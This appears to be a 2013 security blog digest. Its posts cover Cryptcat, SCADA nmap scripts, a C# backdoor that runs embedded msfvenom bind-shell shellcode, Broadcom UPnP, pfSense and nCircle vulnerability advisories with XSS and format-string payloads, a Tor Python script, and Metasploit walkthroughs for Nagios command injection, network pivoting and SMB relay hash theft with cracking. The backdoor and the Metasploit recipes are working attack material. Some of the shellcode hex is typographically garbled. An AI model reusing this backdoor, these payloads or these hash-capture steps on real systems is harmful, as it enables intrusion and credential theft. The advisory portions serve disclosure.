Feb 2, 2013

Cryptcat - encrypting netcat

Cryptcat is a lightweight version of netcat with integrated transport encryption capabilities.

Source: http://sourceforge.net/projects/cryptcat/


NMap Script Engine For SCADA

Please download the script from Source.

nse scripts for scada identification
nmap --script ./Siemens-PCS7.nse -p 80
nmap -sU --script ./Siemens-Scalance-module.nse -p 161
nmap -sU --script ./Siemens-WINCC.nse -p 137

Source: https://github.com/drainware/nmap-scada



Feb 1, 2013

Use .NET csc.exe to create a malicious EXE

I recommend reading the PDF (Undetect Backdoor) and the Source; it's very nice :)

1. Create C# Backdoor with
using System; using System.Reflection; using System.Runtime.InteropServices; namespace ExecASMHardcoded {
        class Program
        {
                [DllImport("kernel32.dll", SetLastError = true)]
                static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);

                public delegate uint Ret1ArgDelegate(uint address);
                static uint PlaceHolder1(uint arg1) { return 0; }

                public static byte[] asmBytes = new byte[]
                {
                        //msfvenom -p windows/shell_bind_tcp -e none | sed -e ‘s/\"//ig’ | sed -e ‘s/+//ig’ | sed -e ‘s/\\x/,0x/ig’
                        0xfc,0xe8,0×89,0×00,0×00,0×00,0×60,0×89,0xe5,0×31,0xd2,0×64,0x8b,0×52,
                        0×30,0x8b,0×52,0x0c,0x8b,0×52,0×14,0x8b,0×72,0×28,0x0f,0xb7,0x4a,0×26,
                        0×31,0xff,0×31,0xc0,0xac,0x3c,0×61,0x7c,0×02,0x2c,0×20,0xc1,0xcf,0x0d,
                        0×01,0xc7,0xe2,0xf0,0×52,0×57,0x8b,0×52,0×10,0x8b,0×42,0x3c,0×01,0xd0,
                        0x8b,0×40,0×78,0×85,0xc0,0×74,0x4a,0×01,0xd0,0×50,0x8b,0×48,0×18,0x8b,
                        0×58,0×20,0×01,0xd3,0xe3,0x3c,0×49,0x8b,0×34,0x8b,0×01,0xd6,0×31,0xff,
                        0×31,0xc0,0xac,0xc1,0xcf,0x0d,0×01,0xc7,0×38,0xe0,0×75,0xf4,0×03,0x7d,
                        0xf8,0x3b,0x7d,0×24,0×75,0xe2,0×58,0x8b,0×58,0×24,0×01,0xd3,0×66,0x8b,
                        0x0c,0x4b,0x8b,0×58,0x1c,0×01,0xd3,0x8b,0×04,0x8b,0×01,0xd0,0×89,0×44,
                        0×24,0×24,0x5b,0x5b,0×61,0×59,0x5a,0×51,0xff,0xe0,0×58,0x5f,0x5a,0x8b,
                        0×12,0xeb,0×86,0x5d,0×68,0×33,0×32,0×00,0×00,0×68,0×77,0×73,0×32,0x5f,
                        0×54,0×68,0x4c,0×77,0×26,0×07,0xff,0xd5,0xb8,0×90,0×01,0×00,0×00,0×29,
                        0xc4,0×54,0×50,0×68,0×29,0×80,0x6b,0×00,0xff,0xd5,0×50,0×50,0×50,0×50,
                        0×40,0×50,0×40,0×50,0×68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0×89,0xc7,0×31,
                        0xdb,0×53,0×68,0×02,0×00,0×11,0x5c,0×89,0xe6,0x6a,0×10,0×56,0×57,0×68,
                        0xc2,0xdb,0×37,0×67,0xff,0xd5,0×53,0×57,0×68,0xb7,0xe9,0×38,0xff,0xff,
                        0xd5,0×53,0×53,0×57,0×68,0×74,0xec,0x3b,0xe1,0xff,0xd5,0×57,0×89,0xc7,
                        0×68,0×75,0x6e,0x4d,0×61,0xff,0xd5,0×68,0×63,0x6d,0×64,0×00,0×89,0xe3,
                        0×57,0×57,0×57,0×31,0xf6,0x6a,0×12,0×59,0×56,0xe2,0xfd,0×66,0xc7,0×44,
                        0×24,0x3c,0×01,0×01,0x8d,0×44,0×24,0×10,0xc6,0×00,0×44,0×54,0×50,0×56,
                        0×56,0×56,0×46,0×56,0x4e,0×56,0×56,0×53,0×56,0×68,0×79,0xcc,0x3f,0×86,
                        0xff,0xd5,0×89,0xe0,0x4e,0×56,0×46,0xff,0×30,0×68,0×08,0×87,0x1d,0×60,
                        0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0×56,0×68,0xa6,0×95,0xbd,0x9d,0xff,0xd5,
                        0x3c,0×06,0x7c,0x0a,0×80,0xfb,0xe0,0×75,0×05,0xbb,0×47,0×13,0×72,0x6f,
                        0x6a,0×00,0×53,0xff,0xd5,
                };

                // Entry point of the listing. It pins the asmBytes array, uses reflection to
                // overwrite the private "_methodPtr" field of a delegate with the address of
                // those bytes, calls VirtualProtect on that memory, and then invokes the
                // delegate, so the bytes in asmBytes run as native code inside this process.
                //
                // Review notes for defenders (all visible in this listing):
                //  - `unsafe`, `fixed` and `byte*` are why step 2 compiles with /unsafe.
                //  - kernel32!VirtualProtect is reached through the DllImport declared above;
                //    its bool result is not checked here.
                //  - The protection argument as published is 0x40, which is
                //    PAGE_EXECUTE_READWRITE: a writable+executable page over a managed byte
                //    array is an uncommon pattern that memory-protection tooling can alert on.
                //  - NOTE(review): the hex literals on this page were altered by the blog's
                //    typography; the listing is kept exactly as printed.
                unsafe static void Main(string[] args)
                {
                        fixed (byte* startAddress = &asmBytes[0]) // Take the address of our x86 code
                        {
                                // Get the FieldInfo for "_methodPtr"
                                // (non-public instance field looked up on System.Delegate;
                                // presumably a runtime-internal detail, so GetField may return
                                // null on other runtimes - TODO confirm)
                                Type delType = typeof(Delegate);
                                FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic |
                                BindingFlags.Instance);

                                // Set our delegate to our x86 code
                                // The delegate is first bound to the no-op PlaceHolder1, then its
                                // target pointer is replaced with the pinned array address.
                                Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
                                _methodPtr.SetValue(del, (IntPtr) startAddress);

                                //Disable protection
                                // Changes the page protection for asmBytes.Length bytes starting at
                                // startAddress; the previous protection is written to outOldProtection
                                // and never restored.
                                uint outOldProtection;
                                VirtualProtect((IntPtr) startAddress, (uint) asmBytes.Length, 0×40, out outOldProtection);
                                // Enjoy
                                // Invoking the delegate transfers control to the bytes in asmBytes;
                                // the value it returns is printed in hex and the process waits for a key.
                                uint n = (uint)0×00000001;
                                n = del(n);
                                Console.WriteLine("{0:x}", n);
                                Console.ReadKey();
                        }
                }
        }
}
 
 
2. Compile and pack it with csc.exe.
C:\Documents and Settings\Administrator\Desktop>C:\WINDOWS\Microsoft.NET\Framewo
rk\v4.0.30319\csc.exe /unsafe shell_bind.cs
Microsoft (R) Visual C# 2010 Compiler version 4.0.30319.1
Copyright (C) Microsoft Corporation. All rights reserved. 

3. Run shell_bind.exe to be the backdoor

4. Connect the backdoor with nc
C:\Documents and Settings\Administrator\Desktop>ncat -vv 127.0.0.1 4444  




Source: http://www.phillips321.co.uk/2013/01/25/use-net-csc-exe-to-create-a-malicious-dllexe-on-locked-down-systems/


Broadcom UPnP Remote Preauth Root Code Execution Vulnerability

Advisory ID: DC-2013-01-003
Advisory Title: Broadcom UPnP Remote Preauth Root Code Execution
Vulnerability
Advisory URL: http://www.defensecode.com/subcategory/advisories-28
Software: Broadcom UPnP software
Vulnerable: Multiple router manufacturers
Vendor Status: Vendors contacted
Initial Release Date: 2013-01-15
Release Date Postponed To: 2013-01-31
Risk: Critical



1. General Overview
===================

During the security evaluation of Cisco Linksys routers for a client,
we have discovered a critical security vulnerability that allows remote
unauthenticated attacker to remotely execute arbitrary code under root
privileges.
Upon initial vulnerability announcement a few weeks ago Cisco spokesman
stated that only one router model is vulnerable - WRT54GL.
We have continued with our research and found that, in fact, same
vulnerable firmware component is also used in at least two other Cisco
Linksys models - WRT54G3G and probably WRT310N. Could be others.

Moreover, vulnerability turns out even more dangerous, since we have
discovered that same vulnerable firmware component is also used across
many other big-brand router manufacturers and many smaller vendors.

Vulnerability itself is located in Broadcom UPnP stack, which is used by
many router manufacturers that produce or produced routers based on
Broadcom chipset.
We have contacted them with vulnerability details and we expect patches
soon. However, we would like to point out that we have sent more than 200
e-mails to various router manufacturers and various people, without much
success.

Some of the manufacturers contacted regarding this vulnerability are
Broadcom, Asus, Cisco, TP-Link, Zyxel, D-Link, Netgear, US Robotics,
and so on.
Routers with vulnerable Broadcom UPnP stack are mostly based on Broadcom
UPnP chipset. You can check how many manufacturers use Broadcom chipset
here: http://wiki.openwrt.org/toh/start  (search for Broadcom, brcm
or bcm).

We don't know exactly how many of them are affected, since we were unable
to contact all of them, but we suspect there are probably tens of millions
vulnerable routers out there.

According to separate recent vulnerability disclosure by Rapid7 in another
UPnP implementation (libupnp):
"In all, 73 per cent of problems occur with products based on four SDKs,
the report found. These are Portable SDK for UPnP Devices; MiniUPnP; a
third, commercial stack that is likely developed by Broadcom; and another
commercial SDK that could not be tracked to a specific developer."
- Rapid7

Many routers have their UPnP interface available over the WAN interface,
so the vulnerability can also be exploited over the internet. It seems
that, at the moment, only popular UPnP implementation that's not hit by
remote preauth security vulnerability is MiniUPnP.



2. Software Overview
====================

Broadcom UPnP is UPnP (Universal Plug and Play) protocol implementation
developed by Broadcom, and often used on routers shipped with Broadcom
chipset.
Vulnerability described in this advisory is located within wanipc and
wanppp modules of Broadcom UPnP stack.
Universal Plug and Play (UPnP) is a set of networking protocols that
permits networked devices, such as personal computers, printers, Internet
gateways, Wi-Fi access points and mobile devices to seamlessly discover
each other's presence on the network and establish functional network
services for data sharing, communications, and entertainment.



3. Vulnerability Description
============================

During the security analysis, we have discovered remote preauth format
string vulnerability in Broadcom UPnP stack. Vulnerability can be
exploited to write arbitrary values to arbitrary memory address, and
also to remotely read router memory. When properly exploited, it allows
unauthenticated attacker to execute arbitrary code under root account.

Full exploit was previously demonstrated in the following video on Cisco
Linksys WRT54GL, that is also based on Broadcom UPnP stack:
http://www.youtube.com/watch?v=cv-MbL7KFKE.

Vulnerability is present in SetConnectionType function of wanipc and
wanppp modules. Vulnerability itself can be reached with a single SOAP
request that calls SetConnectionType function.

SetConnectionType:
------------------
<?xml version="1.0"?>
<SOAP-ENV:Envelope...>
<SOAP-ENV:Body>
    <m:SetConnectionType
xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1" as="">
<NewConnectionType>#FORMAT_STRING#</NewConnectionType>
    </m:SetConnectionType>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
------------------

Format string output is available through GetConnectionTypeInfo SOAP
request as presented below.

GetConnectionTypeInfo:
------------------
<?xml version="1.0"?>
<SOAP-ENV:Envelope...>
<SOAP-ENV:Body>
    <m:GetConnectionTypeInfo
xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
    </m:GetConnectionTypeInfo>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
------------------

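Format string vulnerability is present because user-input from SOAP
request is supplied as a format string argument to the snprintf() function
in files wanipc.c and wanppp.c. The size argument only bounds the output
length; the defect is that the input is used as the format itself, so the
fix is a constant "%s" format with the input passed as a data argument.
Vulnerable code lines are located in the following files and code lines: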

/upnp/igd/wanipc.c:
-------------------
/*
 * SetConnectionType handler from /upnp/igd/wanipc.c, as quoted in the advisory.
 * Writes the first action parameter into the service's ConnectionType variable
 * and always returns TRUE.
 */
static int SetConnectionType(UFILE *uclient, PService psvc, PAction ac,
pvar_entry_t
args, int nargs) {
      /*
       * VULNERABLE: ac->params[0].value is passed as the *format* argument of
       * snprintf(). The advisory states this value comes from the SOAP request,
       * so any conversion specifiers it contains are interpreted. The sizeof()
       * bound limits only the output length and does not prevent that.
       * Remediation: use a constant "%s" format and pass ac->params[0].value
       * as the data argument, so the input is copied literally.
       */
      snprintf(psvc->vars[VAR_ConnectionType].value,
sizeof(psvc->vars[VAR_ConnectionType].value), ac->params[0].value);

      return TRUE;
}
-------------------

/upnp/igd/wanppp.c:
-------------------
/*
 * SetConnectionType handler from /upnp/igd/wanppp.c, as quoted in the advisory.
 * Same body as the wanipc.c handler: writes the first action parameter into
 * the service's ConnectionType variable and always returns TRUE.
 */
int WANPPPConnection_SetConnectionType(UFILE *uclient, PService psvc,
PAction ac,
pvar_entry_t args, int nargs)
/*     "SetConnectionType", WANPPPConnection_SetConnectionType, */
{
      /*
       * VULNERABLE: ac->params[0].value (request-supplied, per the advisory) is
       * the format argument of snprintf(), so conversion specifiers in it are
       * interpreted; the sizeof() bound does not help.
       * Remediation: a constant "%s" format with ac->params[0].value passed as
       * the data argument.
       */
      snprintf(psvc->vars[VAR_ConnectionType].value,
sizeof(psvc->vars[VAR_ConnectionType].value), ac->params[0].value);

      return TRUE;
}
-------------------



4. Solution
===========

Since vulnerability is spread across multiple router manufacturers, and
we were unable to reach all of them on this matter, it's unclear how long
it will take certain manufacturers to patch it. Especially those that we
were unable to contact. However, we're open to any questions from vendors
regarding this vulnerability. Moreover, during the contact with one
particular vendor, we were asked if the vulnerability is in
<name-intentionally-removed> function. It wasn't. But that quickly led us
to yet another vulnerability in also popular router software, obviously
already reported to router manufacturers by someone, but still non-public.
ADVISORY UPDATE: That turns out to be libupnp vulnerability disclosed by
Rapid7.



5. The Exploit
==============

We have developed working exploit as demonstrated in video
http://www.youtube.com/watch?v=cv-MbL7KFKE, but because of the
vulnerability impact and presence of this vulnerability across multiple
router manufacturers, we won't publish the exploit.

Source: http://packetstormsecurity.com/files/119935



Upgrade Windows 7 to Windows 8 for $39.99 before the price goes up to $119.99

As Microsoft's ridiculously low price for upgrading older Windows systems to Windows 8 comes to a close tomorrow, the company has revealed a plan to let students upgrade to Windows 8 Pro for less than half the standard rate.
Microsoft's been running a deal since the Windows 8 launch in October where people who wanted to upgrade Windows XP, Vista, or Windows 7 to Windows 8 could pay only $39.99, but that deal will end tomorrow. As of February 1, upgrading an older Windows computer to Windows 8 will run you $119.99 for the standard edition, or $199.99 for Windows 8 Pro.


Students, however, get a reprieve from the full cost of upgrading. If you've got a valid .edu email account through a qualifying educational institution, you can upgrade from one of the aforementioned systems to Windows 8 Pro for $69.99 starting February 1 if you live in the United States -- a discount of 65 percent.
Non-U.S. residents of 49 countries will receive the discount offer as well, but on a rolling basis. Most English-speaking countries, including Canada, the United Kingdom, Australia, and New Zealand, and Western Europe will get access to the discount on February 21. Eastern Europe and some Asian countries will follow on March 7, with the Middle East and others on March 19.
Updated 1:33 p.m. PDT on January 30, 2013, to clarify that the student discount is for Windows 8 Pro. 

Source:  http://reviews.cnet.com/8301-33642_7-57566725-292/students-to-get-windows-8-upgrade-discount/





Jan 31, 2013

Unicode security testing library

If you want all of the information, please go to the Source.

Major features:

  • Contains methods to get best fit mappings.  For example, you want to know all the characters in various legacy encodings that transform to "<" or some other ASCII character.
  • Contains methods to get Unicode normalization mappings.  For example, you want to know if any special Unicode characters will transform to ">" or some other ASCII character.
  • Contains a small set of hard-coded Unicode characters useful in fuzzing, as well as some functions for returning invalid byte sequences or characters that .NET would not allow by itself (because they're not well-formed).  
    • ill-formed byte sequences
    • Unicode non-characters (an oxymoron?)
    • private use area (PUA)
    • unassigned code points
    • code points with special meaning such as the BOM and RLO
    • half-surrogate values like U+DEAD, a very nasty little guy all by itself

Source: http://web.lookout.net/2013/01/unicode-security-testing-library.html



Jan 30, 2013

DDoS Attacks in 2012


 Source: http://pinterest.com/pin/307933693241382755/

pfSense <= 2.0.1 XSS & CSRF during IPSec XAuth authentication

If you want to get all detail, please go to the Source.

Vulnerability Summary
┌──────────────────────┘
 pfSense versions 2.0.1 and prior are vulnerable to semi-persistent XSS and CSRF attack vectors, exploited by sending Javascript/HTML code as a username during the XAuth user authentication phase.
 XAUTH provides extended authentication for IPSec telecommuters by using authentication schemes such as RADIUS or internal user databases. [source: www.ciscopress.org]
 The vulnerability lies in diag_logs_ipsec.php, which does not properly escape HTML characters from the Racoon log files before displaying them.
 It is assumed that the attacker has successfully completed IPSEC Phase 1 and Phase 2 based on one of the following schemes:
    . Mutual RSA
    . Mutual PSK
    . Hybrid RSA
 It should also be noted that newer pfSense versions use CSRF-magic on the majority of Web GUI forms, thus the CSRF exploitation likelihood is minimized at least in the standard installation.


 Exploit Path
┌─────────────┘
 1) Perform the Phase 1 and Phase 2 using a VPN Client and known credentials/certificates
 2) During the XAuth provide a username like "><script>alert("XSS")</script> and a random password
 3) The reflection of the XSS/CSRF is in the logs under Status > System Logs > IPSec
 The XSS "time-to-live" depends on the Racoon logging verbosity, max number of log lines and vpn activity. Nevertheless, it can be resubmitted to be shown again on top.

 
 Solution
┌─────────┘
 Patch available by vendor, streamlined to 2.1
 URL: http://redmine.pfsense.org/projects/pfsense-tools/repository/revisions/0675bde3039a94ee2cadc360875095b797af018f


Source: http://packetstormsecurity.com/files/119889


Jan 29, 2013

nCircle PureCloud has multiple vulnerabilities

Abstract:
=========
The Vulnerability-Laboratory Research Team discovered a web vulnerability in the nCircle PureCloud (cloud-based) Vulnerability Scanner Application.


Report-Timeline:
================
2012-12-24:  Researcher Notification & Coordination
2012-12-25:  Vendor Notification
2012-01-16:  Vendor Response/Feedback
2012-01-28:  Vendor Fix/Patch by nCircle Dev
2012-01-28:  Public Disclosure


Status:
========
Published


Affected Products:
==================
nCircle
Product: PureCloud - Vulnerability Scanner (cloud-based) 2012 Q4


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
A persistent and client side POST Injection web vulnerability is detected in the nCircle PureCloud (cloud-based) Vulnerability Scanner Application.
This type of vulnerability allows an attacker to inject their own malicious script code in the vulnerable module on application side (persistent).

1.1
The first vulnerability is located in the Scan Now > Scan Type > Perimeter Scan > Scan section when processing to request via the
`Scan Specific Devices - [Add Devices]` module and the bound vulnerable formErrorContent exception-handling application parameters.
The persistent injected script code will be executed out of the `invalid networks` web application exception-handling. To bypass
the standard validation of the application filter the attacker need to provoke the specific invalid networks exception-handling error.
In the second step the attacker splits the request of the invalid filter context so that the unparsed malicious script code is executed after it.
The vulnerability can be exploited on client side via force manipulated link as malicious request with medium user interaction but also
via server side by a post injection in the later affected add server listing module.

1.2
The second vulnerability is bound to the first issue and located in the IP & Name output listing of the scan index after processing to
add a network/server/ip. The code will be executed out of the main ip & name listing after an evil inject via add module. To bypass the
ip restriction filter it is required to split the request like in the first issue with a valid ip. The remote attacker includes a
valid ip+split(%20)`+own_scriptcode to pass through the system validation filter and execute the script code out of the device name and ip listing.


The vulnerability can be exploited with privileged application user account and low or medium required user interaction.
Successful exploitation of the vulnerability result in persistent/non-persistent session hijacking, persistent/non-persistent
phishing, external redirect, external malware loads and persistent/non-persistent vulnerable module context manipulation.


Vulnerable Service(s):
        [+] nCircle PureCloud (cloud-based) Vulnerability Scanner [https://purecloud.ncircle.com/index/]

Vulnerable Section(s):
        [+] Scan Now > Scan Type > Perimeter Scan > Scan

Vulnerable Module(s):
        [+] Scan Specific Devices - [Add Devices]
        [+] Scan IP (Index)

Vulnerable Parameter(s):
        [+] formErrorContent
        [+] ip &- name

Affected Module(s):
        [+] Exception Handling - Invalid Network(s)
        [+] Scan Index - Listing


Proof of Concept:
=================
The client- & server-side web vulnerability can be exploited by remote attackers and local privileged application user accounts with
low or medium user interaction. For demonstration or reproduce ...

1.1
Note:
When you try to inject a standard iframe, img src, script or onload the context will be parsed by the exception-handling to
prevent the first execution after the inject attempt. To bypass the validation we first inject a frame which matches with the invalid
exception filter to display the error. Now, we split the request with %20 and inject our code after the split via POST.

Manually Exploitation:
1. Register an account at nCircle PureCloud to get access to the (cloud-based) Vulnerability Scanner- [https://purecloud.ncircle.com/registerinfo3/?hacknewssocial]
2. Login to your account and switch to the scan now menu, open the scan type site
3. Choose the Perimeter Scan, not the local one!
4. Include a standard script alert tag to provoke the exception-handling, split the request with %20' and inject your own frame onload script code. Save via Add!
5. The script code will be executed out of the exception-handling invalid networks message.
6. Done #1 ... Successful reproduced! Press Continue to exploit also the listing :)

7. Include a valid ip, split the request (bypass the input restriction) and inject after it your own script code.
8. Watch the scan index. The code will be executed out of the vulnerable name and ip value output listing.
9. Done #2 ... Successful reproduced!

PoC:
#1 <iframe src=PROVOKEINVALIDEXCEPTION1> %20' >"<[OWN INJECTED PERSISTENT SCRIPT CODE!]>
#2 <script>alert("PROVOKEINVALIDEXCEPTION2")</script> < %20' "><[OWN INJECTED PERSISTENT SCRIPT CODE!]) <


Review: Scan Specific Devices > [Add Devices] - Exception Handling - Invalid Network(s)

<div style="opacity: 0.87; position: absolute; top: 287px; left: 461px; margin-top: -200px;"
class="id_add_hosts_textformError parentFormscan-form formError">
<div class="formErrorContent">
The following networks are invalid: %20"><"><script>alert(\"PROVOKEEXCEPTION\")> < %20' ">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]>
(host not found)</iframe></div><div class="formErrorArrow"><div class="line10"><!-- --></div><div class="line9"><!-- --></div>
<div class="line8"><!-- --></div><div class="line7"><!-- --></div><div class="line6"><!-- --></div><div class="line5"><!-- --></div>
<div class="line4"><!-- --></div><div class="line3"><!-- --></div><div class="line2"><!-- --></div><div class="line1"><!-- --></div></div></div>
<input value="%20"><iframe src=[PROVOKE!]>%20 >"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]>"
id="id_add_hosts_text" tabindex="5" class="wizardInput" placeholder="Add Devices" type="text">
<button id="add_button" class="addButton">Add</button>
</div>


--- Manipulated POST Values ---
csrfmiddlewaretoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N
json_data={"connector":-1,"scan_connected_network":false,
"registration_id":"","scope_name":"","editing_scope_schedule":false,
"webapp":false,"targets":["><script>alert(\"PROVOKEEXCEPTION\")> < %20' ">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]) <"]}


--- Manipulated POST Request ---

Status: 200[OK]

POST https://purecloud.ncircle.com/services/validate_targets/
Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[181] Mime Type[application/json]
  
Request Header:
      Host[purecloud.ncircle.com]
     
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0]
     
Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
     
Accept-Encoding[gzip, deflate]
      DNT[1]
      Connection[keep-alive]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
     
X-Requested-With[XMLHttpRequest]
      Referer[https://purecloud.ncircle.com/index/]
      Content-Length[439]
     
Cookie[csrftoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N;
sessionid=8c8624ba5e31c63bf24bcbf9af796743;
BIGipServerPICO-443to80=1875711404.20480.0000; utmcct=/ben37.root; wcsid=uNTCNCc0tpp1NCv01YCYlGfr93631472;
hblid=kRw3BvqhoczGhyJc8E8J5dYW93631472;
_oklv=1356379996583%2CuNTCNCc0tpp1NCv01YCYlGfr93631472;
olfsk=olfsk02835150931791619;
_okbk=cd5%3Davailable%2Ccd4%3Dtrue%2Cwa1%3Dfalse%2Cvi5%3D0%2Cvi4%3D1356378355284%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8
%3Dchat%2Ccd6%3D0%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9363-144-10-3734; __unam=97cb67-13bce735458-18f208d4-21;
_mkto_trk=id:671-RXE-353&token:_mch-ncircle.com-1356378363952-41877]
      Pragma[no-cache]
      Cache-Control[no-cache]
  

POST-Daten:
csrfmiddlewaretoken[HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N]
     
json_data[%7B%22connector%22%3A-1%2C%22scan_connected_network%22%3Afalse%2C%22registration_id%22%3A%22%22%2C%22scope_name
%22%3A%22%22%2C%22editing_scope_schedule%22%3Afalse%2C%22webapp%22%3Afalse%2C%22targets%22%3A%5B%22%2520%5C%22+%2520+%5C%22%3E%3C
iframe+src%3Da+onload%3Dalert(%5C%22PROVOKEEXCEPtION%5C%22)+%3C++%5C%22%3E%3C[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!])+%3C%22%5D%7D]
  

Response Header:
Date[Mon, 24 Dec 2012 20:13:25 GMT]
Server[Apache]
Content-Language[en]
Content-Encoding[gzip]
Vary[Accept-Language,Cookie,Accept-Encoding]
X-Frame-Options[SAMEORIGIN]
Content-Length[181]
Keep-Alive[timeout=15, max=76]
Connection[Keep-Alive]
Content-Type[application/json]


1.2
The server-side (persistent) web vulnerability can be exploited by remote attackers and local privileged application user accounts with
low user interaction. For demonstration or reproduce ...

PoC:
[VALID IP]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...
[VALID NAME]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...


Solution:
=========
Parse the exception-handling error output listing and disallow error echos with requested web context.
To fix the vulnerability parse the context of the input fields in the add devices module. Restrict the input fields with a secure filter mask.
Parse also the name & ip scan index output listing and restrict the input of the requested web context scan listing.

2012-01-28:  Vendor Fix/Patch by nCircle Dev

Source: http://packetstormsecurity.com/files/119867


Jan 28, 2013

Howto: Tor With Python

import socket
import socks
import httplib

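def start_connect_tor():
    """Route sockets created after this call through the local Tor SOCKS5 proxy.

    Sets the PySocks default proxy to 127.0.0.1:9050 and replaces
    ``socket.socket`` with ``socks.socksocket``. The replacement is
    process-wide: every module that creates a socket afterwards is affected.
    """
    # The proxy address must be a string; the bare 127.0.0.1 in the original
    # listing is a syntax error. The fourth positional argument is PySocks'
    # rdns flag (True = let the proxy resolve hostnames passed to connect()).
    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
    socket.socket = socks.socksocket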

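def identify_tor():
    """Ask the local Tor control port (127.0.0.1:9051) for a new circuit.

    Clears the default SOCKS proxy so the control connection is made directly
    to localhost, sends AUTHENTICATE, and sends SIGNAL NEWNYM when the reply
    starts with "250". The SOCKS proxy is re-installed afterwards.
    """
    socks.setdefaultproxy()
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect(("127.0.0.1", 9051))
            # An AUTHENTICATE with no credential is only accepted when the
            # control port has no authentication configured, which lets any
            # local process drive Tor. NOTE(review): prefer cookie or
            # hashed-password control authentication and send the credential here.
            s.send("AUTHENTICATE\r\n")
            # The original stored the reply in `respose` and then read
            # `response`, which raised NameError before NEWNYM could be sent.
            response = s.recv(128)
            if response.startswith("250"):
                s.send("SIGNAL NEWNYM\r\n")
        finally:
            s.close()
    finally:
        # Re-install the proxy even when the control connection fails;
        # otherwise the default proxy stays cleared and later sockets would
        # connect directly instead of through Tor.
        start_connect_tor()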

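def main():
    """Fetch http://www.google.com/ through Tor, print the body, then request a new circuit."""
    start_connect_tor()
    # This message only means the proxy settings were installed; no connection
    # to Tor has been attempted yet at this point.
    print("Connected to Tor Network")
    # NOTE(review): the hostname may still be resolved by the system resolver
    # before the proxied connect (httplib connects via socket.create_connection),
    # so confirm that no DNS query leaves the host outside Tor.
    conn = httplib.HTTPConnection("www.google.com")
    conn.request("GET", "/")
    response = conn.getresponse()
    print(response.read())

    identify_tor()

if __name__ == "__main__":
    main()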


Source:  http://www.youtube.com/watch?v=KDsmVH7eJCs
 


Howto: Exploit Nagios 3 History.cgi Host Command Injection With Metasploit

1. Go into Metasploit Console

2. Use Nagios History.cgi Module
use exploit/unix/webapp/nagios3_history_cgi

3. Set Target Host

4. Set Target URI

5. set PAYLOAD

6. Run it.      


Howto: Pivot network with Metasploit session

1. You should get the meterpreter session on victim.

2. Add routing with
run autoroute -s 192.168.168.0/24

3. Now you have already add routing, try to use another post module of Metasploit with
background   


Howto: Metasploit smb relay attack

If you want to see full detail, please go to the Source.

1. Start the Metasploit “smb” capture module to grab password hashes on the attacker’s system:
msfconsole
use auxiliary/server/capture/smb
set CAINPWFILE /cain_hashes.txt
set JOHNPWFILE /john_hashes.txt
exploit

2. Execute the “mssql_ntlm_stealer” Metasploit module to initiate SMB authentication via SQL Server 1 using domain credentials:
  • msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer 
  • set USE_WINDOWS_AUTHENT true 
  • set DOMAIN DEMO 
  • set USERNAME test 
  • set PASSWORD Password12
  • set RHOST 192.168.1.100
  • set RPORT 1433
  • set SMBPROXY 192.168.1.102
  • msf auxiliary(mssql_ntlm_stealer) > run
  • [*] DONT FORGET to run a SMB capture or relay module! [*] 
  • Forcing SQL Server at 192.168.1.100 to auth to 192.168.1.102 via xp_dirtree... [*] 
  • SMB Captured - 2012-11-26 10:45:35 -0600 NTLMv1 Response Captured from 192.168.1.100:1051 - 192.168.1.100 USER:sqlaccount DOMAIN:LVA OS:Windows Server 2003 3790 Service Pack 2 LM: LMHASH:b0b6932dae11731fc8ddf907024858f89fd700cd9fb72170 NTHASH:c180596a2d116a3c70c329de3a7b097c15fb75cb07822d08 
  • [+] Successfully executed xp_dirtree on 192.168.1.100 
  • [+] Go check your SMB relay or capture module for goodies! 
  • [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
3. Crack the first 16 characters of the recovered LANMAN hash with rcracki and a seeded half LM Rainbow Tables. Both can be downloaded from http://www.project-rainbowcrack.com.

  • C:\>rcracki_mt -h b0b6932dae11731f ./halflmchall 
  • Using 1 threads for pre-calculation and false alarm checking... 
  • Found 4 rainbowtable files... 
  • halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti: 
  • reading index... 13528977 bytes read, disk access time: 0.14 s
  • reading table... 461190920 bytes read, disk access time: 4.55 s searching for 1 hash... 
  • plaintext of b0b6932dae11731f is WINTER2 
  • cryptanalysis time: 0.96 s statistics 
  • ------------------------------------------------------- 
  •  
  • plaintext found: 1 of 1 (100.00%) 
  • total disk access time: 4.68 s total 
  • cryptanalysis time: 0.96 s 
  • total pre-calculation time: 2.07 s 
  • total chain walk step: 2876401 
  • total false alarm: 1215 
  • total chain walk step due to false alarm: 1299561 result
  • ------------------------------------------------------- 
  • b0b6932dae11731f WINTER2 hex:57494e54455232
